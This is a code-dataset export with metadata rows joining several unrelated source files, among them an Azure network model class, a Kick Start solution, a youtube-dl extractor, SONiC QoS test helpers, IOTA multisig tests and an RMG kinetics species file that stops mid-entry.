from .resource import Resource
class NetworkInterface(Resource):
"""A NetworkInterface in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource Id
:type id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param virtual_machine: Gets or sets the reference of a VirtualMachine
:type virtual_machine: :class:`SubResource
<azure.mgmt.network.models.SubResource>`
:param network_security_group: Gets or sets the reference of the
NetworkSecurityGroup resource
:type network_security_group: :class:`NetworkSecurityGroup
<azure.mgmt.network.models.NetworkSecurityGroup>`
:param ip_configurations: Gets or sets list of IPConfigurations of the
network interface
:type ip_configurations: list of :class:`NetworkInterfaceIPConfiguration
<azure.mgmt.network.models.NetworkInterfaceIPConfiguration>`
:param dns_settings: Gets or sets DNS settings in network interface
:type dns_settings: :class:`NetworkInterfaceDnsSettings
<azure.mgmt.network.models.NetworkInterfaceDnsSettings>`
:param mac_address: Gets the MAC address of the network interface
:type mac_address: str
:param primary: Gets whether this is a primary NIC on a virtual machine
:type primary: bool
:param enable_ip_forwarding: Gets or sets whether IPForwarding is enabled
on the NIC
:type enable_ip_forwarding: bool
:param resource_guid: Gets or sets resource guid property of the network
interface resource
:type resource_guid: str
:param provisioning_state: Gets provisioning state of the PublicIP
resource Updating/Deleting/Failed
:type provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'virtual_machine': {'key': 'properties.virtualMachine', 'type': 'SubResource'},
'network_security_group': {'key': 'properties.networkSecurityGroup', 'type': 'NetworkSecurityGroup'},
'ip_configurations': {'key': 'properties.ipConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'dns_settings': {'key': 'properties.dnsSettings', 'type': 'NetworkInterfaceDnsSettings'},
'mac_address': {'key': 'properties.macAddress', 'type': 'str'},
'primary': {'key': 'properties.primary', 'type': 'bool'},
'enable_ip_forwarding': {'key': 'properties.enableIPForwarding', 'type': 'bool'},
'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, location=None, tags=None, virtual_machine=None, network_security_group=None, ip_configurations=None, dns_settings=None, mac_address=None, primary=None, enable_ip_forwarding=None, resource_guid=None, provisioning_state=None, etag=None):
super(NetworkInterface, self).__init__(id=id, location=location, tags=tags)
self.virtual_machine = virtual_machine
self.network_security_group = network_security_group
self.ip_configurations = ip_configurations
self.dns_settings = dns_settings
self.mac_address = mac_address
self.primary = primary
self.enable_ip_forwarding = enable_ip_forwarding
self.resource_guid = resource_guid
self.provisioning_state = provisioning_state
self.etag = etag
| [
"[email protected]"
]
| |
cbc244e711bf6a4c305a2d03973ffb5ac09658b0 | 85a6fcace7eaff15242595bdf9b9e8f41116dc7f | /Round A/workout.py | 7d0a0bd6e2ed76a2a224a03c3a89e1a9f3b430f1 | [
"MIT"
]
| permissive | Meenadshi/GoogleKickStart-2020 | e0dfd4f2e44a39c5c58de034265baf2fc7a81f9b | 7c60b5a7a6c9daaf3f20b28d6b60aab19f5f22df | refs/heads/main | 2023-08-15T23:41:31.484139 | 2021-10-17T00:34:58 | 2021-10-17T00:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # Copyright (c) 2020 kamyu. All rights reserved.
#
# Google Kick Start 2020 Round A - Problem C. Workout
# https://codingcompetitions.withgoogle.com/kickstart/round/000000000019ffc7/00000000001d3f5b
#
# Time: O(Nlog(MAX_DIFF))
# Space: O(1)
#
def check(M, K, target):
count = 0
for i in xrange(1, len(M)):
count += ((M[i]-M[i-1])-1)//target # ceiling(diff/target)-1
if count > K:
return False
return True
def workout():
N, K = map(int, raw_input().strip().split())
M = map(int, raw_input().strip().split())
left, right = 1, max(M[i]-M[i-1] for i in xrange(1, len(M)))
while left <= right:
mid = left + (right-left)//2
if check(M, K, mid):
right = mid-1
else:
left = mid+1
return left
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, workout())
| [
"[email protected]"
]
| |
ab81b868a0040eb8cd4674fd20d3f934f5141499 | 981ecc9cf59dd6f839c3e40d26601efb1d073558 | /src/face_recognition/youtube_dl/extractor/tf1.py | e595c4a69b3f03361abc05f6bca61adecb61cf36 | [
"MIT"
]
| permissive | lodemo/CATANA | 469e0684b816f09ac74f186552b463cc77db369e | a349f460772511ccbb16429b40bfb50f774d45d4 | refs/heads/master | 2023-03-30T04:07:12.070332 | 2021-02-03T21:47:32 | 2021-02-03T21:47:32 | 102,767,095 | 12 | 6 | MIT | 2023-03-24T21:55:24 | 2017-09-07T17:36:45 | Jupyter Notebook | UTF-8 | Python | false | false | 2,239 | py | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class TF1IE(InfoExtractor):
"""TF1 uses the wat.tv player."""
_VALID_URL = r'https?://(?:(?:videos|www|lci)\.tf1|(?:www\.)?(?:tfou|ushuaiatv|histoire|tvbreizh))\.fr/(?:[^/]+/)*(?P<id>[^/?#.]+)'
_TESTS = [{
'url': 'http://videos.tf1.fr/auto-moto/citroen-grand-c4-picasso-2013-presentation-officielle-8062060.html',
'info_dict': {
'id': '10635995',
'ext': 'mp4',
'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
}, {
'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
'info_dict': {
'id': 'le-grand-mysterioso-chuggington-7085291-739',
'ext': 'mp4',
'title': 'Le grand Mystérioso - Chuggington',
'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
'upload_date': '20150103',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'skip': 'HTTP Error 410: Gone',
}, {
'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
'only_matching': True,
}, {
'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
'only_matching': True,
}, {
'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
wat_id = self._html_search_regex(
r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
webpage, 'wat id', group='id')
return self.url_result('wat:%s' % wat_id, 'Wat')
| [
"[email protected]"
]
| |
256a78690243b47369486b84acba56ba650f403c | 4131625553ff59b4c730ae7148dd5d603d8cb87d | /hackerEarth/challenges/iitKanpurFreshersProgrammingContest2016/pokeluck.py | 30419fb90a7798a46de3e00cf2d4155fda419afc | [
"MIT",
"Apache-2.0"
]
| permissive | odonnmi/learnNPractice | 29034304303aab3827e6b3334b1d7d9d65b93e54 | eb1c775e4d6e35cebb7b109b46b91f9aecb2d9ec | refs/heads/master | 2020-12-04T14:52:00.520219 | 2019-09-03T06:30:03 | 2019-09-03T06:30:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | # Pokeluck
#######################################################################################################################
#
# Mewtwo is one of the rarest and most famous pokemons in thw pokemon world. If any pokemon gets to fight with
# Mewtwo, he is considered to be "1-lucky". A pokemon that gets to fight with the pokemon who has fought with
# Mewtwo is considered to be "2-lucky", and so on.
#
# The Luckiness is defined on the basis of above mentioned rule. ( 1-Lucky -> Luckiness = 1).
#
# Note1: Consider luckiness of Mewtwo to be 0 .
#
# Note2: No one has negative luckiness.
#
# Note3: If a pokemon A is not Mewtwo himself, and has battled with someone with luckiness X, and has not battled
# with anyone with Luckiness smaller than X, then A has luckiness X+1 .
#
# Note4: It is ensured that every pokemon has finite positive luckiness.
#
# Input:
#
# The first line has two numbers: A,number of pokemons being considered and B, number of pokemon battles
# that have happened.
#
# Then B lines follow, each containing two distinct pokemons, denoting that the two pokemons have battled.
# Pokemons are represented by numbers between 1 and A.
#
# Mewtwo is represented by 1.
#
# Output Format:
#
# Output A-1 lines , ith line containing the luckiness of ith pokemon. (2 <= i <= A)
#
# Constraints:
#
# A <= 1000
#
# B <= (A(A-1))/2 ]
#
#######################################################################################################################
# Input
#
# 3 2
# 1 2
# 2 3
#######################################################################################################################
# Output
#
# 1
# 2
####################################################################################################################### | [
"[email protected]"
]
| |
e4d0583561a6158725a236905afe2fbba09c6263 | d1ad901e1e926d9c92ce4dc7a7ba3c6ee91a65e2 | /spytest/apis/qos/qos.py | c4158600f29cdeb92e9d1a8b3ac6ac00fa192bab | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
]
| permissive | SubhajitPalKeysight/sonic-mgmt | ff59c2c5baf53cc2575aea2d541278fc9cf56977 | e4b308a82572996b531cc09cbc6ba98b9bd283ea | refs/heads/master | 2022-12-31T01:03:47.757864 | 2020-10-15T11:04:37 | 2020-10-15T11:04:37 | 286,815,154 | 1 | 1 | NOASSERTION | 2020-08-11T18:08:34 | 2020-08-11T18:08:33 | null | UTF-8 | Python | false | false | 5,034 | py | import re
from spytest.utils import filter_and_select
from spytest import st
import json
def verify_qos_queue_counters(dut,port,queue_name,param_list,val_list,tol_list):
'''
verifies QOS queue counters in the CLI show qos queue counters
:param dut: Device name where the command to be executed
:type dut: string
:param port: interface name to be checked
:type dut: string
:param queue_name: queue name to be checked
:type dut: string
:param param_list: list of params to be verified; example ['pkts_count', 'pkts_drop']
:param val_list: list of expected values for the params specified; example ['10000','5000']
:param tol_list: tolerence value for each param while comparing; for example ['1000', '500']
:return: True/False True - success case; False - Failure case
usage: verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count', 'pkts_drop'],
['10000','5000'],['1000', '500'])
verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count'],['10000'],['1000'])
Created by: Julius <[email protected]
'''
success = True
cli_out = st.show(dut,'show queue counters {}'.format(port))
fil_out = filter_and_select(cli_out, param_list, {"port" : port, "txq" : queue_name})
if not fil_out:
st.error('port: {} and queue name: {} not found in output: {}'.format(port,queue_name,cli_out))
return False
else:
fil_out = fil_out[0]
for param,val,tol in zip(param_list,val_list,tol_list):
try:
fil_out[param] = re.sub(",","",fil_out[param])
int(fil_out[param])
except ValueError:
st.error('cannot get integer value from obtained string: {}'.format(fil_out[param]))
return False
if int(fil_out[param])<=int(val)+int(tol) and int(fil_out[param])>=int(val)-int(tol):
st.log('obtained value: {} is in the range b/w {} and {} as expected for param: {}'
'in queue: {}'.format(int(fil_out[param]),int(val)-int(tol),
int(val)+int(tol),param,queue_name))
else:
st.error('obtained value: {} is NOT in the range b/w {} and {} for param: {}'
'in queue: {}'.format(int(fil_out[param]), int(val) - int(tol),
int(val) + int(tol), param, queue_name))
success = False
return True if success else False
def clear_qos_queue_counters(dut):
'''
:param dut: DUT name where CLI to be executed
:type dut: string
:return: True/False True - Success ; False - Failure
usage:
clear_qos_queue_counters(dut1)
Created by: Julius <[email protected]
'''
return True if st.show(dut,'show queue counters --clear',skip_tmpl=True) else False
def bind_qos_map_port(dut, map_name, obj_name, interface):
'''
:param dut: device to be configured
:type dut: string
:param map_name: qos map name for example dscp_to_tc_map, tc_to_queue_map
:type map_name: string
:param obj_name: object name for example AZURE
:type obj_name: string
:param interface: interface to be associated for example Ethernet1
:type interface: string
:return: True/False True - Success ; False - Failure
usage:
bind_qos_map_port(dut1, "tc_to_queue_map", "Azure", "Ethernet0")
bind_qos_map_port(dut1, "dscp_to_tc_map", "Azure", "Ethernet2")
bind_qos_map_port(dut1, "tc_to_pg_map", "Azure", "Ethernet72")
Created by: Julius <[email protected]
'''
final_data, temp_data = dict(), dict()
data = { map_name : "[" + map_name.upper() + "|" + obj_name + "]"}
temp_data[interface] = data
final_data['PORT_QOS_MAP'] = temp_data
data_json = json.dumps(final_data)
return st.apply_json(dut, data_json)
def clear_qos_config(dut):
'''
Author: Chaitanya Vella ([email protected])
Clears all the QOS realted config from the device
:param dut:
:return:
'''
command = "config qos clear"
st.config(dut, command)
def create_qos_json(dut, block_name, sub_block, dict_input):
'''
:param dut: device to be configured
:type dut: string
:param block_name: name of the field in json, for eg: dscp_to_tc_map, tc_to_queue_map, wred_profile etc
:type block_name: string
:param sub_block: sub field name, for eg: AZURE, AZURE_LOSSLESS etc
:type sub_block: string
:param dict_input: input values in dictionary
:type dict_input: string
:return: True/False True - Success ; False - Failure
usage:
create_qos_json(dut1, "tc_to_queue_map", "Azure", {"wred_green_enable" : "true"})
Created by: Julius <[email protected]
'''
final_data, temp_data = dict(), dict()
temp_data[sub_block] = dict_input
final_data[block_name.upper()] = temp_data
final_data = json.dumps(final_data)
return st.apply_json(dut, final_data)
| [
"[email protected]"
]
| |
6585fb31b416dfd35f83c956c594528d69b6d742 | 3fe5046326c0e6a63b9de6ab4de8f094f1e49614 | /bin/indent-ged | 165c4adbf540abe1e9a436dfd7f6e341711abfa8 | []
| no_license | dave-shawley/ged-work | cc7d6b71a58e3ac05d94177c018efe969fc60e0d | 1edc7d6c2b871d65668a7ec347a42d3727e615d1 | refs/heads/master | 2020-03-23T22:01:52.407922 | 2019-04-21T14:33:06 | 2019-04-21T14:33:06 | 142,148,536 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | #!/usr/bin/env python
#
import sys
with open(sys.argv[1], 'r+') as f:
lines = f.readlines()
f.seek(0)
for line in lines:
indent, rest = line.split(None, 1)
f.write('\t' * int(indent))
f.write(line)
| [
"[email protected]"
]
| ||
cefb634734daaaddf09a98024d5ec5e44fb354b5 | edb88981aa1420af7e074068ed7818b9d904a3dd | /tags/release-0.4.2/minds/test/test_cachefile.py | 550d17ef92064fd5da222650ab9c462809cf2eb8 | []
| no_license | BackupTheBerlios/mindretrieve-svn | 101c0f1dfc25d20d5f828b6fd0d43301b773af4e | 463745fcf1c1d5b1f6c201c30bcc339c99b437ed | refs/heads/master | 2021-01-22T13:57:31.225772 | 2006-04-28T04:24:43 | 2006-04-28T04:24:43 | 40,801,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | """
"""
import os, os.path, sys
import unittest
from config_help import cfg
from minds import cachefile
class TestCacheFile(unittest.TestCase):
FILE1 = 'testcache'
def setUp(self):
self.pathname = os.path.join(cfg.getPath('logs'), self.FILE1)
self.cleanup()
def tearDown(self):
self.cleanup()
def cleanup(self):
# hardcode path to avoid deleting real data in config goof
try: os.remove('testlogs/' + self.FILE1 + '.mlog')
except OSError: pass
try: os.remove('testlogs/' + self.FILE1 + '.qlog')
except OSError: pass
def test_write(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
c.write_qlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.qlog'))
self.assert_(os.path.getsize(self.pathname+'.qlog'),5)
c.write_mlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.mlog'))
self.assert_(os.path.getsize(self.pathname+'.mlog'),5)
def test_discard(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
c.discard()
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
if __name__ == '__main__':
unittest.main() | [
"tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990"
]
| tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990 |
788e4f26f9ce4a49e8009089a81dd509608996ca | 1c527a1944264784ba6ed237a723376bdee47f02 | /src/utl/strip_csv.py | 0c3dc9fa82235b03ec8b3ca868c5a6d64b12ed89 | []
| no_license | mikegleen/modes | 3544517467b77ddb21ec50c2a624b98e0a7ea308 | e77c89f28c623ce8fd30d7727a1b914461c6a0fd | refs/heads/master | 2023-09-03T15:10:26.931110 | 2023-08-27T07:31:42 | 2023-08-27T07:31:42 | 139,562,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | """
For each cell in a CSV file, strip leading and trailing whitespace.
"""
import codecs
import csv
import sys
def main():
incsv = codecs.open(sys.argv[1], 'r', 'utf-8-sig')
outcsv = codecs.open(sys.argv[2], 'w', 'utf-8-sig')
outwriter = csv.writer(outcsv)
for row in csv.reader(incsv):
for column in range(len(row)):
row[column] = row[column].strip() if row[column] else row[column]
outwriter.writerow(row)
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
08a13407b68ca6cda24394e7cdfc4eb4314bec1e | bc64931a5cdfed6d54a8d8828e9b9d4510d7a998 | /test/multisig/commands/create_multisig_address_test.py | 83ae9dbd6d76cdcf5210d0bea2085f4dc26f7cac | [
"MIT"
]
| permissive | valentinlehuger/iota.lib.py | 4b9ddfda9c283b4fde6d9ba6ab5d6c1add5cd920 | e345de981829a36ceaccf3862835c0dd28486950 | refs/heads/master | 2021-01-19T12:26:09.709236 | 2017-07-16T01:19:39 | 2017-07-16T01:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,866 | py | # coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from unittest import TestCase
import filters as f
from filters.test import BaseFilterTestCase
from iota import TryteString
from iota.adapter import MockAdapter
from iota.crypto.types import Digest
from iota.filters import Trytes
from iota.multisig import MultisigIota
from iota.multisig.commands import CreateMultisigAddressCommand
from iota.multisig.types import MultisigAddress
from six import binary_type, text_type
class CreateMultisigAddressCommandTestCase(TestCase):
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressCommandTestCase, self).setUp()
self.adapter = MockAdapter()
self.command = CreateMultisigAddressCommand(self.adapter)
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_wireup(self):
"""
Verify that the command is wired up correctly.
"""
self.assertIsInstance(
MultisigIota(self.adapter).createMultisigAddress,
CreateMultisigAddressCommand,
)
def test_happy_path(self):
"""
Generating a multisig address.
"""
result = self.command(digests=[self.digest_1, self.digest_2])
# noinspection SpellCheckingInspection
self.assertDictEqual(
result,
{
'address':
MultisigAddress(
trytes =
b'JUIFYSUQFVBFGNHOJMLWBHMGASFGBPAUMRZRRCJF'
b'CCOJHJKZVUOCEYSCLXAGDABCEWSUXCILJCGQWI9SF',
digests = [self.digest_1, self.digest_2],
),
},
)
class CreateMultisigAddressRequestFilterTestCase(BaseFilterTestCase):
filter_type = CreateMultisigAddressCommand(MockAdapter()).get_request_filter
skip_value_check = True
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressRequestFilterTestCase, self).setUp()
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_pass_happy_path(self):
"""
Request is valid.
"""
request = {
'digests': [self.digest_1, self.digest_2],
}
filter_ = self._filter(request)
self.assertFilterPasses(filter_)
self.assertDictEqual(filter_.cleaned_data, request)
def test_pass_compatible_types(self):
"""
Request contains values that can be converted to the expected
types.
"""
filter_ = self._filter({
# ``digests`` may contain any values that can be converted into
# :py:class:`Digest` objects.
'digests': [binary_type(self.digest_1), TryteString(self.digest_2)],
})
self.assertFilterPasses(filter_)
self.assertDictEqual(
filter_.cleaned_data,
{
'digests': [self.digest_1, self.digest_2],
},
)
def test_fail_empty(self):
"""
Request is empty.
"""
self.assertFilterErrors(
{},
{
'digests': [f.FilterMapper.CODE_MISSING_KEY],
},
)
def test_fail_unexpected_parameters(self):
"""
Request contains unexpected parameters.
"""
self.assertFilterErrors(
{
'digests': [self.digest_1, self.digest_2],
# Oh, and I suppose that's completely inconspicuous.
'foo': 'bar',
},
{
'foo': [f.FilterMapper.CODE_EXTRA_KEY],
},
)
def test_fail_digests_null(self):
"""
``digests`` is null.
"""
self.assertFilterErrors(
{
'digests': None,
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_wrong_type(self):
"""
``digests`` is not an array.
"""
self.assertFilterErrors(
{
'digests': self.digest_1,
},
{
'digests': [f.Array.CODE_WRONG_TYPE],
},
)
def test_fail_digests_empty(self):
"""
``digests`` is an array, but it's empty.
"""
self.assertFilterErrors(
{
'digests': [],
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_contents_invalid(self):
"""
``digests`` is an array, but it contains invalid values.
"""
self.assertFilterErrors(
{
'digests': [
b'',
True,
None,
b'not valid trytes',
# This is actually valid; I just added it to make sure the
# filter isn't cheating!
TryteString(self.digest_1),
2130706433,
],
},
{
'digests.0': [f.Required.CODE_EMPTY],
'digests.1': [f.Type.CODE_WRONG_TYPE],
'digests.2': [f.Required.CODE_EMPTY],
'digests.3': [Trytes.CODE_NOT_TRYTES],
'digests.5': [f.Type.CODE_WRONG_TYPE],
},
)
| [
"[email protected]"
]
| |
12098a4349966f1bb91731bacb395b298b3dec81 | 04803c70bb97012b7d500a177ac0240fb2ddbe38 | /3heptane_pdep/pdep/network42_1.py | ba15fe7bcaabbec6ac0c67a81fd946ab69ff1f2e | []
| no_license | shenghuiqin/chpd | 735e0415f6688d88579fc935459c1b0f53596d1d | 396ba54629036e3f2be0b3fabe09b78c90d56939 | refs/heads/master | 2023-03-01T23:29:02.118150 | 2019-10-05T04:02:23 | 2019-10-05T04:02:23 | 192,084,217 | 0 | 0 | null | 2019-06-18T18:33:13 | 2019-06-15T13:52:28 | HTML | UTF-8 | Python | false | false | 51,612 | py | species(
label = 'CCCC(CCC)O[O](138)',
structure = SMILES('CCCC(CCC)O[O]'),
E0 = (-164.605,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4082.6,'J/mol'), sigma=(7.30891,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=637.69 K, Pc=23.73 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.385645,0.0992146,-7.63202e-05,3.28023e-08,-6.09818e-12,-19642.1,35.265], Tmin=(100,'K'), Tmax=(1218.12,'K')), NASAPolynomial(coeffs=[12.329,0.0574631,-2.49073e-05,4.66449e-09,-3.23359e-13,-22739.7,-28.5844], Tmin=(1218.12,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-164.605,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(552.912,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'O2(2)',
structure = SMILES('[O][O]'),
E0 = (-8.62178,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1483.7],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (31.9988,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(887.157,'J/mol'), sigma=(3.467,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53764,-0.00122827,5.36759e-06,-4.93128e-09,1.45955e-12,-1037.99,4.6718], Tmin=(100,'K'), Tmax=(1087.71,'K')), NASAPolynomial(coeffs=[3.16427,0.00169454,-8.00335e-07,1.5903e-10,-1.14891e-14,-1048.45,6.08303], Tmin=(1087.71,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.62178,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""O2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[CH]CCC(73)',
structure = SMILES('CCC[CH]CCC'),
E0 = (-21.1865,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3025,407.5,1350,352.5,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (99.194,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3350.7,'J/mol'), sigma=(6.3658,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=523.37 K, Pc=29.47 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
